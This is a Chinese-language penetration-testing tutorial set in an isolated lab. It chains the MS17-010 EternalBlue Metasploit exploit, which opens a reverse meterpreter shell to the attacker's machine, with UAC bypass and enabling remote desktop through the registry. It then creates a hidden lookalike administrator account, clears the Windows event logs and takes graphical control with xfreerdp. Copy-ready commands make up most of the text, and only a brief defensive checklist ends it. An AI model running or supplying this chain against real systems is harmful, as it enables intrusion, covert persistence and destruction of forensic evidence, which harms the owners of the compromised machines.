实战演练：从漏洞利用到图形化控制，一条龙打通内网靶机

1. 靶场环境搭建与工具准备在开始实战之前我们需要先搭建一个安全的实验环境。我建议使用VMware或VirtualBox这类虚拟机软件来创建隔离的网络环境。攻击机选择Kali Linux 2023.04版本靶机则使用Windows 7 SP1 x64系统。这里有个小技巧给Kali分配2GB以上内存Windows 7分配4GB内存这样运行远程桌面时会更流畅。网络配置采用Host-Only模式确保实验环境与真实网络隔离。我的测试环境中Kali IP设为192.168.25.130Win7设为192.168.25.132。你可以用以下命令快速检查网络连通性ping -c 4 192.168.25.132在Kali上需要确保Metasploit框架更新到最新版。我习惯先做一次完整更新sudo apt update sudo apt upgrade -y2. 利用永恒之蓝漏洞获取初始访问永恒之蓝MS17-010是经典的SMB协议漏洞虽然微软早已发布补丁但在内网渗透测试中仍可能遇到未打补丁的系统。使用Metasploit时我推荐先加载漏洞模块再设置参数msfconsole use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.25.132 set payload windows/x64/meterpreter/reverse_tcp set LHOST 192.168.25.130 exploit成功利用后你会看到meterpreter会话。这里有个实用技巧立即执行getuid查看当前权限如果是普通用户可以用getsystem尝试提权。我遇到过几次需要配合bypassuac的情况这时可以background use exploit/windows/local/bypassuac set SESSION 1 exploit3. 开启远程桌面服务的实战技巧拿到system权限后先用netstat -ano查看3389端口状态。如果没开启我推荐使用注册表修改法因为某些精简版系统可能缺少wmic组件reg add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f有个重要细节修改后需要重启远程桌面服务才能生效。在meterpreter中可以这样操作execute -f cmd.exe -c -H -i -t sc stop TermService sc start TermService为防止管理员修改默认端口建议检查注册表reg query HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp /v PortNumber4. 创建隐蔽用户的最佳实践直接使用net user命令创建的用户很容易被发现。我的经验是创建一个与系统用户相似的用户名比如把字母o替换成数字0net user adm1n0 Password123! /add net localgroup administrators adm1n0 /add更隐蔽的做法是修改用户属性使其不在登录界面显示reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v adm1n0 /t REG_DWORD /d 0 /f记得清除事件日志wevtutil cl system wevtutil cl security wevtutil cl application5. 建立图形化控制通道Kali自带的xfreerdp功能强大但参数较多我整理了一份常用参数组合xfreerdp /v:192.168.25.132 /u:adm1n0 /p:Password123! /size:90% clipboard /dynamic-resolution /cert:ignore遇到连接问题时可以添加/log-level:debug参数查看详细日志。如果网络不稳定试试压缩传输xfreerdp /v:192.168.25.132 /compression /jpeg6. 痕迹清理与防御建议完成测试后务必清理痕迹。删除用户时要注意顺序net user adm1n0 /delete reg delete HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v adm1n0 /f从防御角度我建议企业环境至少做到及时安装MS17-010补丁限制SMB协议的外部访问启用网络级认证(NLA)定期审计用户账户监控注册表关键项变更在实际渗透测试项目中这种图形化控制方式要慎用因为会产生大量日志。我通常只在获取关键数据时短暂使用完成后立即清除所有痕迹。